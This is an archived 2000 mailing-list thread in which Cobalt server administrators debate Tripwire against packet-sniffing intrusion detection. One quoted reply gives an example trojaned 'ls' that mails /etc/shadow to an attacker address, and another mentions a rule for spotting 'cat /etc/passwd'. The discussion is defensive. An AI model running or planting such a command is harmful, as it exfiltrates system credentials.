[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [cobalt-users] tripwire

Subject: RE: [cobalt-users] tripwire
From: "Mark Spieth" <mspieth@xxxxxxxxxxxx>
Date: Wed Mar 8 01:53:13 2000
Yes these things are all true. There is no question that tripwire alone is
not enough and sure it is extremely possible to modify things within a
directory that would be hard to monitor using tripwire. I suppose my point
is that tripwire is one more way to secure up your server enviroment. All
these things you mention are great assuming that they DO pick up the
exploit. Assuming some new one comes out and they don't recognize it. It
would at least be nice to know that ls is still ls and not some other
script.

-----Original Message-----
From: cobalt-users-admin@xxxxxxxxxxxxxxx
[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of Geoff King
Sent: Tuesday, March 07, 2000 7:22 PM
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: Re: [cobalt-users] tripwire


Mark,

    Sorry Mark but, my statement is true.

    Yes, directories are defined.  Perhaps, a hacker modifies files outside
/sbin or whatever directories are being monitored?  My point was that you
couldn't possibly monitor the entire directory structure on a heavily used
server.

    You should take a look again at packet monitoring software.  They
monitor for key signatures that would indicate an exploit is being done
(i.e. the remote BIND exploit for example) or the many WU-FTPD exploits or
the many web CGI exploits, etc, etc, etc...  I know that Sessionwall-3 does
this as I have used it extensively.  I could even write a rule to monitor
for 'cat /etc/passwd' within a telnet session or whatever...  No, packet
monitoring software will not tell you wether or not a file have been changed
or modified on a server.  However, having a log of a user sending/recieving
data that matches a known exploit.  Cybercop also has the ability to detect
intrusions and then throw up a bogus server for the hacker to waste his time
on all day thinking they'll get in to some goodie server.

    What I was saying about Tripware is that, you will be notified AFTER the
fact that your files have been modified.  You will have no indication before
hand.

    This is kind of the same reason people put up security cameras instead
of inventorying all their stuff.  It's a heck of a lot easier watching
someone steal something that remembering about the tiny trinket that's been
sitting on the shelf for 3 years.  When was the last time you saw it?

Geoff



----- Original Message -----
From: "Mark Spieth" <mspieth@xxxxxxxxxxxx>
To: <cobalt-users@xxxxxxxxxxxxxxx>
Sent: Thursday, March 02, 2000 4:36 PM
Subject: RE: [cobalt-users] tripwire


> Actually this is NOT true. You are supposed to define what directories
> tripwire monitors. You point it to portions of your server that contain
> binary files such as /bin /sbin/ /usr this is where a hacker is going to
do
> things, not in a users web directory so the fact that those directories
> change won't affect tripwire.
>
> >>packet sniffing programs like ISS or what my business partner uses
> Sessionwall-3
> This only helps to attempt to track down a user. For example, The Bind
hack
> allows someone to gain a root shell via port 53, so as far as your sniffer
> goes, it will probably just see dns traffic. At least if you run tripwire
> should a hacker modify binaries on your machine, trip wire will notice the
> fact that command "ls" has been modified to do this:
>
> cat /etc/shadow |mail haxor@xxxxxxxxxx
> ls
>
>
>
> -----Original Message-----
> From: Geoff King [mailto:geoff@xxxxxxxxxx]
> Sent: Thursday, March 02, 2000 7:31 PM
> To: cobalt-users@xxxxxxxxxxxxxxx
> Subject: Re: [cobalt-users] tripwire
>
>
> Gary,
>
>     I have installed Tripwire on a RedHat Linux v5.2 box.
>
>     Basically, it's considerably useless on a server that many people use
> because it monitors changes in files, which on a hosting web server, files
> change quite often.
>
>     I have found the best means of monitoring hackers is to obtain a stand
> alone server and use packet sniffing programs like ISS or what my business
> partner uses Sessionwall-3.  There's a bunch more out there, I can't think

> of their names off the top of my head.
>
>     I thought it was kind of moot point for Tripwire as you'd only know
> after the hacker gained access and modified files.  It's much better
> watching the knock at the door first.
>
>     Now, if the server is not used for many things, such as a secondary
DNS
> server, and that's it.  Tripwire would be a fairly decent tool in that
you'd
> definately know if someone was on there and messing with files that should
> never be changed or modified.
>
>     The other thing to do is hack your network yourself.  I run Nessus
which
> is an open-source security scanner about once every 6 months to see what
it
> can do.  It's a good idea to pay attention to the security announcements.
> Any administrator should know exactly where someone can break into their
> network.  Also, an administrator should be able to notice odd or different
> behavior of servers and the network fairly quickly.
>
>     Anyways, that's my 2 cents worth on tripwire.  Good tool, for specific
> purposes.  Don't ignore it, but don't count on it either.
>
> Geoff
>
> ----- Original Message -----
> From: "RHLinux" <rhlinux@xxxxxxxxxxx>
> To: "Cobalt-Users@xxxxxxxxxxxxxxx" <cobalt-users@xxxxxxxxxxxxxxx>
> Sent: Thursday, March 02, 2000 2:55 AM
> Subject: [cobalt-users] tripwire
>
>
> > has anyone tired installing tripwire on a raq2-3?
> >
> > its suppose to help in tracking would be attackers etc...
> >
> > http://www.zdnet.com/zdnn/stories/news/0,4586,2453339,00.html
> >
> > Gary
> >
> >
> > _______________________________________________
> > cobalt-users mailing list
> > cobalt-users@xxxxxxxxxxxxxxx
> > To Subscribe or Unsubscribe, please go to:
> > http://list.cobalt.com/mailman/listinfo/cobalt-users
> >
>
>
> _______________________________________________
> cobalt-users mailing list
> cobalt-users@xxxxxxxxxxxxxxx
> To Subscribe or Unsubscribe, please go to:
> http://list.cobalt.com/mailman/listinfo/cobalt-users
>
> _______________________________________________
> cobalt-users mailing list
> cobalt-users@xxxxxxxxxxxxxxx
> To Subscribe or Unsubscribe, please go to:
> http://list.cobalt.com/mailman/listinfo/cobalt-users
>


_______________________________________________
cobalt-users mailing list
cobalt-users@xxxxxxxxxxxxxxx
To Subscribe or Unsubscribe, please go to:
http://list.cobalt.com/mailman/listinfo/cobalt-users
References:
- Re: [cobalt-users] tripwire
  - From: Geoff King
Prev by Date: RE: [cobalt-users] mx record
Next by Date: Re: [cobalt-users] Cron question
Previous by thread: Re: [cobalt-users] tripwire
Next by thread: [cobalt-users] Tripwire
Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index